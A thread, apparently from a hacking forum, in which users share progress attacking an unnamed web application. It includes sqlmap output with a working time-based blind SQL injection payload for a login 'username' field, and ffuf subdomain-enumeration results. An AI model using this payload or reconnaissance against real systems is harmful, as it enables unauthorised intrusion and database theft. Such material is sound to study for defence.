[hexforce]

there's sqli. Username is injectable.

[hexforce]

Can dump DB with SQLI

[grieving7]

Have you find anything useful?

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=x' AND (SELECT 2000 FROM (SELECT(SLEEP(5)))GcxH) AND 'DeaG'='DeaG
---
[22:08:29] [INFO] the back-end DBMS is MySQL
[22:08:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[teky]

Can dump DB with SQLI

cant get command working would you mind sharing command

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[sa1B1B]

Can dump DB with SQLI

cant get command working would you mind sharing command

https://book.hacktricks.xyz/pentesting-w...ion/sqlmap

[osamy7593]

lol patched sqli ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[upl04d3r]

SQLI on cacti or website? Not work for me on both

[ch4dx0]

Can dump DB with SQLI

cant get command working would you mind sharing command

https://book.hacktricks.xyz/pentesting-w...ion/sqlmap

LOL, that was tricky, laughing as a mf xD

[osamy7593]

it was patched guys ..

we have another subdomains

:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
:: Filter : Response size: 13560
________________________________________________

cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
www.marketing [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9981ms]
setup [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9983ms]
rpc [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9986ms]
zeta [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9989ms]
ibank [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9987ms]
helm [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9990ms]
mailgateway [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9978ms]

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[upl04d3r]

it was patched guys ..

we have another subdomains

:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
:: Filter          : Response status: 404
:: Filter          : Response size: 13560
________________________________________________

cacti                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
www.marketing          [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9981ms]
setup                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9983ms]
rpc                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9986ms]
zeta                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9989ms]
ibank                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9987ms]
helm                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9990ms]
mailgateway            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9978ms]

nope, its redirected to main page. You have a bad syntax in ffuf